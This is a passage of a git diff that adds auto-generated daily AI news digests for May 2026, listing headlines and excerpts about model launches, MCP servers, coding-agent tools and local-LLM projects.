Open](https://x.com/Business_AI/status/2056374805163856261) +*Aligned News (Scoble)* | 18/05/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> xAI has entered the agentic coding market with Grok Build, creating a three-way race with Claude Code and OpenAI Codex for developer workflow ownership. Braygent's take: this matters for everyone building with AI. + +--- + +## [New models when? Forecasting release date.](https://reddit.com/r/LocalLLaMA/comments/1tgh8to/new_models_when_forecasting_release_date/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: product_launch, open_source + +> After the recent releases, there's almost a sense of emptiness. When do you think new models will be released? Looking at the chart, it's between the end of May and the beginning of June, but... I don't know why, it seems like something's changing about "open weights" + +--- + +## [Cutoff dates of open source models](https://reddit.com/r/LocalLLaMA/comments/1tg9rcp/cutoff_dates_of_open_source_models/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: mcp, open_source + +> I was trying Qwen 3.6-27b and Gemma4 in a siomple web chat. Asked them both a qn like 'recommend the best llm for a 5060ti' and was suprised when they both replied 'user is asking about a card that doesn't exist'. I then saw their knowledge cutoff was early 2025, hence why. But tech advances so fast, in that 1yr+ there have been tons of changes in languages, frameworks, best practices and tech, not to mention AI. of course the model could use MCP etc to do a web search, but its pretraining is still using 1yr+ older knowledge. Found that suprisising and probably explains a few things, but its not something widely known I think + +--- + +## [Follow-up: adding Ollama support to my open-source cursor-aware AI app - looking for beta testers with vision-capable local models](https://reddit.com/r/LocalLLaMA/comments/1tg4ux6/followup_adding_ollama_support_to_my_opensource/) +*Reddit r/LocalLLaMA* | 18/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> EDIT 2: Trick-Assignment-828 pointed me at the actual rule update from the mods - Rule 3 Low Effort was expanded to cover LLM-assisted posts without disclosure. Disclosing now: Disclosure: I'm a non-native English speaker (German). This post was drafted by me with AI used for a grammar pass. Structure, technical content, the ask, the Skales reference, and all decisions are mine. Wasn't aware of the rule update until called out in comments. Apologies for missing it. If mods feel this still violates Rule 3 even with disclosure, happy for it to come down. Otherwise leaving up so the technical thread can continue. \--- EDIT: Updated model list based on this thread's feedback... \[Original post body\] Edit: Updated model list based on this thread's feedback — Qwen3.5/3.6 family and Qwen3.6-35B-A3B are the current recommendations, not the older Qwen2.5-VL / Llama 3.2 Vision references that were carried over from my older post. Thanks jacky2060, ilintar, and others for the corrections. \--- Follow-up to my [latest post](https://www.reddit.com/r/LocalLLaMA/comments/1tcl96f/looking_for_fast_visioncapable_local_models_that/) asking about fast vision-capable local models with reliable tool c… + +--- + +## [memv ships an MCP server — OSS memory layer for agents, now usable from any MCP client](https://reddit.com/r/ClaudeAI/comments/1tg6jjq/memv_ships_an_mcp_server_oss_memory_layer_for/) +*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.94 +Tags: mcp, tool_update + +> memv (OSS, Python) gained an MCP server today. If you're building on Claude Desktop / Code / Cursor — or your own MCP host — you get persistent, structured memory without writing integration code. ```bash pip install "memvee[mcp]" memv-mcp --db-url memory.db --llm-model openai:gpt-4o-mini ``` Or mount it inside your own process: ```python from memv.mcp.server import create_server server = create_server( db_url="memory.db", default_user_id="alice", embedding_client=my_embedder, llm_client=my_llm, ) server.run(transport="streamable-http") ``` **Surface:** - 5 MCP tools: `search_memory`, `add_memory`, `add_conversation`, `list_memories`, `delete_memory` - LLM optional — retrieval/add work LLM-free; only `add_conversation` extraction needs one - Per-user isolation at every tool boundary, including `delete_memory` ownership check - Concurrent extractions for the same user coalesce onto one task For context if you haven't seen memv before: predict-calibrate extraction (Nemori-inspired) so we don't store everything, bi-temporal model so contradictions expire instead of overwriting, hybrid retrieval (vector + BM25 + RRF). Docs: https://vstorm-co.github.io/memv/advanced/mcp-server/ GitHub:… + +--- + +## [Every Markdown File You Write for AI is Already Lying to It](https://reddit.com/r/ClaudeAI/comments/1tgilrn/every_markdown_file_you_write_for_ai_is_already/) +*Reddit r/ClaudeAI* | 18/05/2026 | Score: 0.70 +Tags: api_update, developer_tool + +> CLAUDE.md files. System prompts. README files with setup instructions. Architecture docs. API references. Runbooks. Onboarding guides. If you've written a markdown file meant for an AI to read, it almost certainly contains values that were true when you wrote them and are no longer true now. The port your dev server runs on. The current version of the package. Which env vars are actually set. How many tests exist. Whether a service is running. These things change constantly, and markdown doesn't know it. So developers do what honest writers do - they add caveats. "Check package.json if this is stale." "Verify before running." "New packages may have been added since this was written." The intent is good. The effect is a list of things the AI has to go verify before it can do anything you actually asked for. We counted them in a real CLAUDE.md. There were seven. And CLAUDE.md is just one file type - the same problem exists everywhere AI reads markdown today. # The Pre-Flight Tax Here's a representative CLAUDE.md. Nothing here is invented - these are patterns from real production repos: # CLAUDE.md > Before starting any session: Read ~/projects/api-core/SYNC.md first and check for… + +--- + +## [Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automat…](https://x.com/Shruti_0810/status/2056266132592468126) +*X / @shruti_0810* | 18/05/2026 | Score: 0.70 +Tags: mcp, developer_tool + +> Claude Code feels completely different once you install this. Anthropic quietly released an official plugin that transforms Claude Code from a simple coding assistant into a full AI dev environment. It scans your entire project and automatically recommends: → MCP servers → + +--- + diff --git a/data/digest-2026-05-19.md b/data/digest-2026-05-19.md new file mode 100644 index 0000000..ac18857 --- /dev/null +++ b/data/digest-2026-05-19.md @@ -0,0 +1,117 @@ +# Stack Scout - AI News Digest +**2026-05-19** | 15 stories | Auto-generated from 634 archived stories + +--- + +## [Google launches Antigravity 2.0 with an updated desktop app and CLI tool](https://techcrunch.com/2026/05/19/google-launches-antigravity-2-0-with-an-updated-desktop-app-and-cli-tool/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch, cli_tool, tool_update + +--- + +## [Google releases Gemini 3.5 Flash for complex agentic workflows, coding, and reasoning at 289 tokens per second and higher scores than Gemini 3.1 Pro on Terminal-Bench 2.1, GDPval-AA, and MCP Atlas — Large token quotas appeared in Google Cloud Console before wider rollout.](https://www.digg.com/ai/9p5cqkyn?rank=2) +*Digg AI* | Score: 1.00 +Tags: mcp, product_launch, cli_tool + +--- + +## [Anthropic just bought the company that generates most production MCP servers](https://reddit.com/r/ClaudeAI/comments/1thkkrb/anthropic_just_bought_the_company_that_generates/) +*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool + +> Anthropic acquired Stainless on Monday for a reported $300M+. Most coverage is framing this as a developer tools acquisition. Stainless is best known for generating the official Python and Node SDKs that ship with OpenAI, Google, Meta, Cloudflare, and Anthropic. The SDK story is real. The MCP side is the part that matters here. Stainless was one of the first vendors to extend their compiler to produce MCP servers from the same OpenAPI specs that produce their SDKs. MCP hit \~97M monthly SDK downloads by December 2025 and around 10,000 production servers by early 2026. A lot of that production code was Stainless-generated. Anthropic now owns the dominant MCP server generator. What actually changed hands on Monday: 1. The engineering team. Roughly 40-50 people including founder Alex Rattray, who previously built Stripe's patented SDK generation system. Now reporting to Katelyn Lesse in Anthropic's Platform Engineering org. 2. The technology. The generator, the templates, the language-specific runtimes, the OpenAPI extensions Stainless invented for SDK-specific edge cases. 3. The hosted product is winding down. New signups stopped Monday. New SDK and MCP server generations stopped Mo… + +--- + +## [favorite Agentic Coding Harness](https://reddit.com/r/LocalLLaMA/comments/1th5t1b/favorite_agentic_coding_harness/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: developer_tool, cli_tool, agent_tool + +> So far, I’ve tried Codex CLI, Claude Code, Gemini CLI, OpenCode, and recently, Pi with local models. Pi is the leanest of them all, with just four tools: read, write, edit, and bash. Its system prompt is only under 2K tokens, and it's perfect for local models. I've been trying out Qwen 27B-MXFP8 with it, and it's much better than I expected! It doesn't have fancy bells and whistles like multi agents, but the only thing I’m missing is searching the web for documentation. I’m sure you can get it through an extension, but you probably won’t get the same robust search features you get from commercial platforms anyways. This might be my new favorite! What’s yours? + +--- + +## [Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advan…](https://x.com/AlternativeTo/status/2056637498978398395) +*X / @alternativeto* | 19/05/2026 | Score: 0.86 +Tags: mcp, cli_tool, tool_update + +> Tripsy's latest update integrates Model Context Protocol (MCP), allowing users to plan trips using AI clients and tools. AI can adjust itineraries by time, location, or preference, and a command-line interface has also been added for advanced users. https:// alternativeto.net/news/2026/5/tr ipsy-adds-mcp-integration-and-cli-support-for-ai-powered-travel-planning-and-organization/ … + +--- + +## [Google introduces Gemini Spark, a 24/7 agentic assistant with Gmail integration](https://techcrunch.com/2026/05/19/google-introduces-gemini-spark-a-24-7-agentic-assistant-with-gmail-integration/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch, tool_update + +--- + +## [Edison Scientific announces partnership with Incyte to deploy Kosmos AI agent across full drug development pipeline from molecular design through FDA approval — Incyte becomes first company to integrate the system end-to-end.](https://www.digg.com/ai/r5p7scr1?rank=3) +*Digg AI* | Score: 1.00 +Tags: product_launch, agent_tool + +--- + +## [Why is LM-Studio download page showing me 0.4.7 to download when the latest version is 0.4.13?](https://reddit.com/r/LocalLLaMA/comments/1thx8eo/why_is_lmstudio_download_page_showing_me_047_to/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: github_release, tool_update + +> I'm currently running LM-Studio 0.4.12. In the app if I check for updates it says there's a new version (0.4.13), I can read the changelog for 0.4.13, but when I go to [https://lmstudio.ai/download](https://lmstudio.ai/download) it shows 0.4.7. What's going on here? Anyone knows? + +--- + +## [OpenAI cofounder Andrej karpathy just joined anthropic and the talent war is officially over](https://reddit.com/r/ClaudeAI/comments/1thw3bu/openai_cofounder_andrej_karpathy_just_joined/) +*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 +Tags: api_update, product_launch + +> this happened literally today ,andrej karpathy one of the most respected ai researchers alive nd the guy whose youtube lectures taught half the developers in this sub how neural networks work, just announced he is joining anthropic's pre training team. He's the 3rd senior openai figure to defect to anthropic in under two years. Jan leike left in may 2024, John schulman (co-founder) left in august 2024 and now karpathy. He is joining the pre training team under nick josef and building a new team focused on using claude to accelerate pre training research which means Anthropic is betting that claude can help make itself smarter, thats recursive self improvement with one of the most capable researchers in the world leading it. The musk trial verdict came in yesterday with the jury ruling in altman's favor, karpathy announces today voilaa . The timing is either coincidental or the most savage talent acquisition move in tech history. I hv been watching this trajectory while building my own workflows on claude ,every month the ecosystem around claude gets stronger. The connectors mean claude orchestrates professional creative tools natively, the api means platforms like magic hour and k… + +--- + +## [Floor for local meeting summarization on a 6GB GPU: qwen3.5:0.8b works at 57s, Granite 4 350M hallucinates](https://reddit.com/r/LocalLLaMA/comments/1thsset/floor_for_local_meeting_summarization_on_a_6gb/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> Disclosure: I made this. Open-source, MIT, Windows + Linux. Not affiliated with [voiceflow.com](http://voiceflow.com) (the chatbot SaaS, name collision, sorry). Why this exists: I wanted local-only dictation and meeting transcription, because audio shouldn't have to leave the machine just to become text. I had a 6GB GPU sitting there doing nothing most of the day. So I built it: hold a hotkey, faster-whisper transcribes locally, text pastes at the cursor. v1.6.0 shipped today and adds the meetings recorder: mic + system audio into one stereo file, transcribed locally, summary goes through whatever endpoint you point it at (Ollama, llama.cpp, Groq, OpenAI). The only network call in the whole product is the optional summary, and you pick where it goes. The on-topic part for this sub: mini models on real workloads. v1.6.0 was the excuse to actually benchmark this on real meeting transcripts instead of toy prompts. I tried the latest small Qwen first, qwen3.5:0.8b (873M, Q8\_0). Test rig: RTX 3060 Laptop 6GB, \~4.3GB free after Whisper loads, Ollama 0.23, Arch. Input: a real 4-minute meeting, \~2900 chars. It works, with one caveat. Ollama's VRAM-aware default num\_ctx on this GPU is… + +--- + +## [bytedance released an open source model that attempts to do just about anything with only 3b parameters](https://reddit.com/r/LocalLLaMA/comments/1thkwgk/bytedance_released_an_open_source_model_that/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Lance is a lightweight native unified multimodal model that supports **image and video understanding, generation, and editing** within a single framework. * **Efficient at 3B scale.** With only **3B active parameters**, Lance delivers strong performance across image generation, image editing, and video generation benchmarks. * **Trained from scratch.** Lance is built with a staged multi-task recipe and trained entirely from scratch within a **128-A100-GPU** budget. + +--- + +## [How I built a 9-agent team where my agents actually talk to each other](https://reddit.com/r/ClaudeAI/comments/1thi16y/how_i_built_a_9agent_team_where_my_agents/) +*Reddit r/ClaudeAI* | 19/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> I've been running Claude Code for 6 months, shipping my product and running content/launch ops for it. The thing that kept breaking wasn't the agents themselves. It was me. Every handoff between research and write and code and review was me copy pasting context between sessions. I was the dispatcher and context holder for my own AI team Tried gstack first. The roles are great but I'm still the one cycling through slash commands. /office-hours → /plan-eng-review → /review → /ship. Good output, but I'm orchestrating every step Spent a weekend porting my workflow over. Here's the lineup: **Engineering (4 agents)** * arch: owns architectural decisions. Reviews proposed changes before code starts. Soul: "senior staff engineer, asks 'what breaks at 10x' before approving anything * backend: owns /api, /services. Implements after arch greenlights * frontend: owns /web. Picks up from backend when API contracts are stable * review: reads every PR before I do. Catches the lazy stuff so I only review substantive changes **Growth/Content (5 agents)** * research: uses ahrefs MCP to analyse keywords/opportunities/market and hands off to strategist * strategist: reads research, writes campaign br… + +--- + +## [We have sub-agents at home](https://reddit.com/r/LocalLLaMA/comments/1th8a43/we_have_subagents_at_home/) +*Reddit r/LocalLLaMA* | 19/05/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> At work I get unfettered access to gpt 5.4 and sonnet, so I'm quite used to spawning sub-agents to go crazy on a repo and split up tasks. At home I am VRAM poor and like to run the models locally for my own enjoyment. Almost every single sub-agent extension/implementation does not account for any of the restrictions imposed by having 10gb of VRAM and a single slot for a KV cache (thats already quantized). I already work as a developer, so I qwen3.6-35b-a3b tagged teamed a partially vibe-coded fork of an existing sub-agent repository for pi coding agent. This is really only relevant if you: * Use pi coding agent as your harness * Can only run a single LLM at a time with 1 slot via llama.cpp server * Want to use sub-agents without fully reprocessing your prompts after the sub-agent is done Repo is [here](https://github.com/BenjaminBilbro/pi-subagent), feel free to use it or fork it idc. I am also interested in how others around here have dealt with sub-agents on a purely local and VRAM constrained setup. I was also planning to add the ability for sub-agents to be spawned with no previous context, and manage the saving and storing the main context via \`--slot-save-path\` and the \`s… + +--- + +## [Glia – Local-first shared memory layer (SQLite-vec + FTS5 + Offline Knowledge Graph)](https://reddit.com/r/ChatGPT/comments/1ther0u/glia_localfirst_shared_memory_layer_sqlitevec/) +*Reddit r/ChatGPT* | 19/05/2026 | Score: 0.86 +Tags: cli_tool, tool_update + +> Hey everyone, I wanted to share a project I've been working on called Glia. It is a 100% offline, local-first RAG and memory layer designed to connect your AI web chats (Claude, ChatGPT, DeepSeek) with your local developer tools (Claude Code, Cursor, Windsurf) using a unified local database. I wanted something lightweight that did not require pulling heavy Docker containers or subscribing to third-party memory APIs. I settled on a Node.js + SQLite architecture running sqlite-vec (for 768-dim float32 embeddings) alongside SQLite FTS5 for hybrid search, powered completely by local Ollama instances. We just launched a live website that outlines the details and demonstrates the features in action: * Website: [https://glia-ai.vercel.app/](https://glia-ai.vercel.app/) * Codebase: [https://github.com/Eshaan-Nair/Glia-AI](https://github.com/Eshaan-Nair/Glia-AI) Technical Stack & Features: * Hybrid Search Retrieval: SQLite-vec (using nomic-embed-text locally) + FTS5 keyword prefix matching (porter stemmer). * Surgical Sentence-level Trimming: Chunks are sliced into sentences. When a prompt is intercepted, only the exact matching sentences are pulled out of the vector store instead of t… + +--- + +## [Centralize SKILLs](https://reddit.com/r/ClaudeAI/comments/1thc7pg/centralize_skills/) +*Reddit r/ClaudeAI* | 19/05/2026 | Score: 0.86 +Tags: open_source, agent_tool + +> We recently tried to roll out an AI agent workflow across a 60-person company, and we found out 1. need to centralize the SKILLs files 2. update, versioning markdown file supporting multi users is a challenge Does Claude enterprise version offer any solution? or there are any open source project helping company to manage skills ? Since these are just text files, we could hack together a workaround using SharePoint to distribute them internally. But are there any actual purpose-built tools for this? + +--- + diff --git a/data/digest-2026-05-20.md b/data/digest-2026-05-20.md new file mode 100644 index 0000000..152b39f --- /dev/null +++ b/data/digest-2026-05-20.md @@ -0,0 +1,107 @@ +# Stack Scout - AI News Digest +**2026-05-20** | 15 stories | Auto-generated from 630 archived stories + +--- + +## [Antigravity unifies its agentic surfaces under a single platform incorporating Antigravity 2.0 desktop app, CLI, SDK, and IDE for consistent access across environments](https://www.digg.com/ai/xizlma81) +*Digg AI* | Score: 1.00 +Tags: api_update, developer_tool, cli_tool + +--- + +## [Put your spare Claude cycles on night shift: help review open-source packages](https://reddit.com/r/ClaudeAI/comments/1tizbag/put_your_spare_claude_cycles_on_night_shift_help/) +*Reddit r/ClaudeAI* | 20/05/2026 | Score: 0.94 +Tags: open_source, developer_tool, cli_tool + +> Hello, I’m building Thirdpass, a tool/service for coordinating collaborative package review to reduce software supply-chain risk. The basic idea: there are far too many packages for humans to manually review, but lots of us now have AI coding agents sitting around with spare capacity. Thirdpass tries to turn that into useful coverage by assigning packages/files to review, collecting the results, and cross ref against local project dependencies. It currently supports packages from: - crates.io - PyPI - npm - Ansible Galaxy I added a “night shift” mode, so you can point Claude at the shared review backlog and let it work through package reviews continuously: ``` thirdpass review-any --nightshift ``` The reviews are first-pass supply-chain reviews: suspicious install scripts, unexpected network behavior, credential handling, sketchy build steps, weird package metadata, and so on. Partial coverage still helps. I’m looking for people who want to: - run the CLI and donate spare Claude tokens to secure OSS - improve the review prompts/agent workflow - build more registry extensions I started this project years ago after thinking a lot about `cargo-crev` and collaborative review. My curre… + +--- + +## [Re. what ever happened to Cohere’s Command-A series of models?](https://reddit.com/r/LocalLLaMA/comments/1tizmar/re_what_ever_happened_to_coheres_commanda_series/) +*Reddit r/LocalLLaMA* | 20/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hey everyone, Nick Frosst here from Cohere. A few months ago Aidan (my cofounder) [left a comment](https://www.reddit.com/r/LocalLLaMA/comments/1rf8nou/comment/o8rkdrf/) in here about our Command series and how we were working on some more powerful, open-weights models behind the scenes. We just launched Command A+ and we wanted to share it with you guys. TLDR is we built a really efficient model. It’s our first MoE model, which is exciting. There’s obvs work to do on top-line performance but it’s easily looking like one of the fastest and most responsive models in our category. We also pulled off some incredible quantization work so it runs really well on even 1 or 2 GPUs. Like with R7B, we really prioritized making the model practical, so smaller teams and devs could realistically use it to build the kind of agents we ship for our platform customers. That’s also why it’s under Apache 2.0. Just total, near unfettered access to a pretty awesome model. We’re enterprise-first but honestly, we get so much out of our open-source community that makes us more innovative and creative. The feedback you give will almost certainly influence how we think about models and product going forwar… + +--- + +## [Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software — The launch targets developers and organizations with constrained compute resources.](https://www.digg.com/ai/tvrhpn35?rank=1) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Cohere releases Command A+, its most advanced large language model optimized to run efficiently on limited hardware while delivering high performance and available as open-source software](https://www.digg.com/ai/tvrhpn35) +*Digg AI* | Score: 1.00 +Tags: product_launch, open_source + +--- + +## [Gemini 3.5 Flash Benchmarks Change The Workhorse Model Race](https://x.com/koraykv/status/2056795667088204234) +*Aligned News (Scoble)* | 20/05/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> Gemini 3.5 Flash launched with strong numbers on agentic, coding, ARC AGI, and speed focused benchmarks. + +--- + +## [Remove-AI-Watermarks – CLI and library for removing AI watermarks from images](https://github.com/wiltodelta/remove-ai-watermarks) +*Hacker News* | 19/05/2026 | Score: 0.88 +Tags: developer_tool, cli_tool + +--- + +## [Seven questions decide whether your AI agent ships. Most teams can answer two.](https://natesnewsletter.substack.com/p/agent-infrastructure-control-layer) +*Nate's Newsletter* | Score: 0.82 +Tags: tool_update, agent_tool + +--- + +## [open source Gemini CLI](https://github.com/google-gemini/gemini-cli) +*Simon Willison's Blog* | Score: 0.74 +Tags: open_source, cli_tool + +--- + +## [Antigravity SDK](https://github.com/google-antigravity/antigravity-sdk-python) +*Simon Willison's Blog* | Score: 0.74 +Tags: api_update, developer_tool + +--- + +## [After a year in Claude Code, the thing slowing me down turned out to be me](https://reddit.com/r/ClaudeAI/comments/1ti8cwr/after_a_year_in_claude_code_the_thing_slowing_me/) +*Reddit r/ClaudeAI* | 20/05/2026 | Score: 0.70 +Tags: mcp, cli_tool + +> I have used Claude Code daily for about a year. I kept assuming the way to get faster was a better model or a sharper prompt. It was neither. The slow part was me, and I had stopped noticing. There is an old xkcd (#1205, "Is It Worth the Time?") that charts how long you can spend automating a task before the automation costs more than it saves. It assumes the expensive part of automating is you, sitting down to build the thing. That assumption is dead. An agent writes the script in the time it takes to describe it. So almost everything is worth automating now, and the only real skill left is noticing what to automate. It sorted into four categories for me. Each one has a "tell," a thing you catch yourself doing: - Connect: you're copy-pasting between tools, alt-tabbing, ferrying data by hand. Fix is an MCP server or a CLI so the agent reaches the source itself. - Encode: you're running the same sequence of steps again. Fix is a script or a skill. - Teach: you're typing the same instructions or context again. Fix is putting it in CLAUDE.md or a skill. - Parallelize: you're sitting and watching one agent work. Fix is running several. The last one was the big one. When an agent is ge… + +--- + +## [Stability AI releases a new audio model that can create 6-minute songs](https://techcrunch.com/2026/05/20/stability-ai-release-a-new-audio-model-that-can-create-six-minute-songs/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [Exa raised $250 million in a Series C at a $2.2 billion valuation led by Andreessen Horowitz, reporting 400,000 developers and 5,000 company adopters for its AI agent search platform — Token usage grew 20x for agent-driven queries.](https://www.digg.com/ai/1te0bqvt?rank=2) +*Digg AI* | Score: 1.00 +Tags: agent_tool + +--- + +## [AI server under 5k?](https://reddit.com/r/LocalLLaMA/comments/1tirzfm/ai_server_under_5k/) +*Reddit r/LocalLLaMA* | 20/05/2026 | Score: 1.00 +Tags: developer_tool + +> I have a framework desktop 128GB and a 3080 12GB running qwen 7b I want to move to a proper server rack + switch but not sure how to move from desktop PC to server rack. Any advice on what GPU/Server to get under 5k? Or at that price just stick to workstation? + +--- + +## [under 2% quality gap but 10x cost difference: tested 5 models on identical tool calling tasks[D]](https://reddit.com/r/MachineLearning/comments/1tiqsao/under_2_quality_gap_but_10x_cost_difference/) +*Reddit r/MachineLearning* | 20/05/2026 | Score: 1.00 +Tags: mcp + +> I've been running a file management agent built on MCP for a few months. It handles module renames, import updates, validation scaffolding, test execution. A typical session is 60 to 120 tool calls. The whole thing was powered by Opus 4.7 because I never thought to question it until I looked at my April bill. So I set up a comparison. Eight refactoring tasks on a 15k line Python project, same MCP tools, same system prompt, same repo state, five models. Tasks were things like "rename this module and fix all imports" and "add input validation to these 12 endpoints." Routine cleanup, nothing requiring deep architectural thought. The metric I cared about was first attempt tool call success: did the model produce a valid function call that executed without a parse error on the first try? On the expensive end, Opus 4.7 hit roughly 98 to 99 percent across a bit over 500 calls and cost close to $15 for all eight tasks. GPT 5 was similar quality for around $11. The cheaper tier surprised me. Sonnet 4.6 landed somewhere around 96 percent for about $4. DeepSeek V4 Pro was in the same neighborhood for under $2. And Tencent Hunyuan Hy3 preview came in within a couple of points of Opus for unde… + +--- + diff --git a/data/digest-2026-05-21.md b/data/digest-2026-05-21.md new file mode 100644 index 0000000..5cdaf95 --- /dev/null +++ b/data/digest-2026-05-21.md @@ -0,0 +1,119 @@ +# Stack Scout - AI News Digest +**2026-05-21** | 15 stories | Auto-generated from 634 archived stories + +--- + +## [Anthropic officially launched 13+ FREE AI courses with certificates (Including Agentic AI and Claude Code!)](https://reddit.com/r/ClaudeAI/comments/1tjpfh8/anthropic_officially_launched_13_free_ai_courses/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool, tool_update, agent_tool + +> Just found out about this and had to share because almost nobody is talking about it yet. If you are tired of paying for AI courses or getting hit with paywalls just to get a certificate, Anthropic (the creators of Claude) quietly dropped a massive library of completely free, official training modules. Yes, they actually give you an official certificate of completion directly from Anthropic once you finish. Here is the breakdown of what is available and exactly how to get it without spending a dime. What is in the course catalog? They have split the training into a few different paths depending on what you want to do: * **The Big Surprise: Agentic AI & MCP:** They have official courses on the Model Context Protocol (MCP). This is the cutting-edge tech used to build AI Agents that can browse your local computer, use tools, and execute tasks autonomously. * **Claude Code 101:** Dedicated developer modules for their new command-line agent. It teaches you how to let Claude edit your codebase, run tests, and use its new "Plan Mode." * **API & Cloud Architecture:** Deep dives into building with the Claude API, plus corporate tracks for deploying Claude securely inside Amazon Bed… + +--- + +## [Qwen releases Qwen3.7-Max, its latest flagship model for agent workloads that achieves 69.7 on Terminal-Bench 2.0 and completed a 35-hour kernel optimization with over 1,000 tool calls — Supports multi-file coding agents, MCP integrations, and multi-agent orchestration.](https://www.digg.com/ai/5rbia2h1?rank=4) +*Digg AI* | Score: 1.00 +Tags: mcp, product_launch, cli_tool + +--- + +## [I built a zero-code visual client to test remote MCP servers instantly (Tested with Cloudflare’s free MCP).](https://reddit.com/r/ClaudeAI/comments/1tjpzfg/i_built_a_zerocode_visual_client_to_test_remote/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 1.00 +Tags: mcp, cli_tool, tool_update + +> Hey everyone, The Model Context Protocol (MCP) is amazing for standardizing how agents talk to data, but I got incredibly frustrated every time I wanted to quickly test a new remote MCP server. Writing custom client-side boilerplate or wrestling with CLI tools just to see if a tool actually exposes the right schema is a massive time sink. So, I built a native MCP client directly into the visual canvas of **AgentSwarms**. You can now test any remote MCP server entirely in the browser without writing a single line of code. **Here is the workflow I just tested with Cloudflare:** Cloudflare released a free MCP server for their documentation. Instead of building a local client to test it: 1. I dropped their SSE URL into the new MCP Servers integration in AgentSwarms. 2. The canvas immediately connected and extracted the available tools (e.g., `cloudflare-docs-search`). 3. I wired that tool up to a basic agent and started asking complex infrastructure questions in natural language. The agent successfully used the MCP tool to pull live docs and synthesize an answer. **Why this is useful for AI devs:** If you are building your own MCP servers, you need a fast way to visually test if your… + +--- + +## [I did what Microsoft wouldn't - updated POML VS Code extension](https://reddit.com/r/LocalLLaMA/comments/1tjine7/i_did_what_microsoft_wouldnt_updated_poml_vs_code/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, tool_update + +> **What's a POML?** Microsoft came up with this really cool HTML style mark-up language that allows you to make modular prompt templates, with all sorts of neat features like **local AI support via OpenAI API**, setting runtime parameters for your LLM, and embedding documents into the prompt. You could even send the prompt directly to your LLM via the VS Code extension. **What happened to it?** I don't fucking know. They supported it for 2-3 months, then ghosted when it didn't hit KPIs or something, I guess. Then a VS Code or dependency update exposed a bug in how they handled `/>`, which is actually **fairly common** in POML when you embed documents. This broke the ability to directly send prompts to the LLM - you could copy them out of the preview, but it was slower and less efficient. **What I did** I used [OpenCode](https://opencode.ai/) (which doesn't get enough play here - I only found out about it because someone posted a repo for an **extension** to it) and the [opencode-power-pack](https://github.com/waybarrios/opencode-power-pack) (said extension) to try to find the bug and update some of the more egregiously outdated dependencies. It took me a couple of days to get wo… + +--- + +## [Show HN: Rmux – A programmable terminal multiplexer with a Playwright-style SDK](https://github.com/helvesec/rmux) +*Hacker News* | 21/05/2026 | Score: 0.82 +Tags: api_update, developer_tool, cli_tool + +--- + +## [I built Hivemind, a Claude Code plugin that turns your repeated prompts into auto-generated skills](https://reddit.com/r/ClaudeAI/comments/1tjw0ah/i_built_hivemind_a_claude_code_plugin_that_turns/) +*Reddit r/ClaudeAI* | 21/05/2026 | Score: 0.70 +Tags: api_update, open_source, developer_tool + +> Disclosure: I work on Hivemind. Per the subreddit rules, posting with a full description of what it is and how it works. **What it is** Hivemind is an open-source Claude Code plugin. It installs into Claude Code, watches the traces from your sessions, finds patterns you repeat, and crystallizes them into reusable skills that show up as native slash commands in Claude Code. Because it's a plugin and not an external tool, the skills it generates drop in as proper Claude Code slash commands. No external tool calls, no separate config files to maintain. **What it does in practice** Every morning for about a week, I was writing the same long prompt to Claude Code to pull together a team standup review. Same structure, same context blocks, slightly different details each day. I never thought to turn it into a custom slash command. Hivemind noticed the pattern and built `/team-standup` for me on its own. I didn't configure it or ask for it; it watched the repeats and crystallized the skill. Other slash commands it's built from my team's usage: an environment-aware database debugging command that knows our dev vs prod clusters and kubectl context, a PostHog SDK testing helper, a few other… + +--- + +## [LlamaStation v0.9 — llama.cpp GUI for Windows with multi-backend support, TurboQuant, MTP and more](https://reddit.com/r/LocalLLaMA/comments/1tjm58w/llamastation_v09_llamacpp_gui_for_windows_with/) +*Reddit r/LocalLLaMA* | 21/05/2026 | Score: 1.00 +Tags: product_launch, cli_tool + +> I've been building this for the past few months as a side project — started because I didn't want to run llama.cpp from the command line every time I wanted to try a model. I just wanted something that worked with a click. Fair warning: I'm not a developer. This is 100% vibe coded with AI assistance. If something in the codebase makes you cringe, please be kind and open a PR instead 🙏 Most frontends either hide everything behind abstractions (Ollama, LM Studio) or leave you writing command lines manually. LlamaStation tries to sit in the middle: a clean UI with full access to every parameter. What makes it different Runs llama-server directly — no intermediate layer, no daemon, no abstraction. LlamaStation launches llama-server.exe as a subprocess with full control over every flag. What you configure is exactly what gets passed to the binary. This means you get the full performance of llama.cpp with none of the overhead that tools like Ollama add on top. Multiple backends, switchable from the UI: ⚡ Official llama.cpp (with MTP support since PR #22673) 🔬 TurboQuant fork — asymmetric KV cache quantization. This is the killer feature for me: 200k+ context on 24GB VRAM (dual RTX 306… + +--- + +## ['Am I OpenAI compatible' - a tool and documentation for unified api 